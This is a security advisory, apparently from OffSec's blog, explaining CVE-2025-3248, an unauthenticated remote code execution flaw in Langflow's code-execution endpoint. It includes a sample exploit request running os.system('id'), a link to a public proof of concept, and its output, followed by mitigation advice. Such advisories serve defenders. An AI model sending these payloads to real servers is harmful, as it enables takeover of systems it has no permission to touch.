/
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
Jun 18, 2025
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
OffSec Team
Overview
CVE-2025-3248 is a critical unauthenticated remote code execution (RCE) vulnerability in Langflow, a popular low-code framework for building LLM applications. The flaw stems from the unsafe use of Python’s built-in exec() function to evaluate user-supplied input without sanitization. This allows attackers to execute arbitrary Python code on the server, completely compromising the underlying system.
- CVE ID: CVE-2025-3248
- Severity: Critical
- CVSS Score: 9.8
- EPSS Score: 92.57%
- Published: May 22, 2025
- Affected Versions: ≤ v1.3.0
- Patched Version: v1.3.0+
Technical Breakdown
Langflow exposes a /api/v1/builder/execute_code endpoint that takes user-supplied Python code and passes it directly to exec() on the backend. Since there’s no authentication or sandboxing, attackers can craft arbitrary payloads for code execution.
POST /api/v1/builder/execute_code
Content-Type: application/json
{
"code": "import os; os.system('id')"
}There is no sandbox, no ast.literal_eval, no subprocess control — just direct unsanitized execution of attacker input.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing- Langflow instance accessible over the network
- No authentication required on vulnerable endpoint
- Version ≤ 1.3.0
Exploitation Steps
A working public PoC is available at: https://github.com/xuemian168/CVE-2025-3248.git
To exploit the vulnerable Langflow instance, clone the repository and execute the provided script against the target.
┌──(kali㉿kali)-[~]
└─$ python main.py -t http://172.17.0.2:7860/
╔══════════════════════════════════════════════════════════════╗
║ Langflow Vulnerability Scanner ║
║ CVE-2025-3248 Detection & Exploitation ║
╚══════════════════════════════════════════════════════════════╝
[*] Testing endpoint: http://172.17.0.2:7860/api/v1/validate/code
[+] Target appears to be vulnerable!
[+] Executing command: id
uid=1000(langflow) gid=1000(langflow) groups=1000(langflow)
Upon successful exploitation, the command executes server-side with the privileges of the langflow process.
Mitigation
- Upgrade to Langflow v1.3.0 or later
- Restrict access to vulnerable endpoints via firewall or reverse proxy
- Remove or replace use of exec() with safer alternatives
- Require authentication on all API endpoints
- Implement runtime application protection and egress restrictions
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data vulnerability
CVE-2024-12029: A critical deserialization vulnerability in InvokeAI’s /api/v2/models/install endpoint allows remote code execution via malicious model files. Exploit risk for AI art servers.
Jul 17, 2025
0
Research & Tutorials
What is Phishing? Introduction to Phishing Demo (for Beginners)
Learn how phishing attacks work and how to spot them. Watch OffSec’s animated video to protect yourself from scams, spoofed sites, and social engineering.
Jul 15, 2025
2 min read
Research & Tutorials
CVE-2025-27636 – Remote Code Execution in Apache Camel via Case-Sensitive Header Filtering Bypass
Discover the critical Apache Camel vulnerability (CVE-2025-27636) that allows remote code execution via case-sensitive HTTP header manipulation in the exec component. Learn how attackers exploit this flaw and how to mitigate it.
Jul 10, 2025
2 min read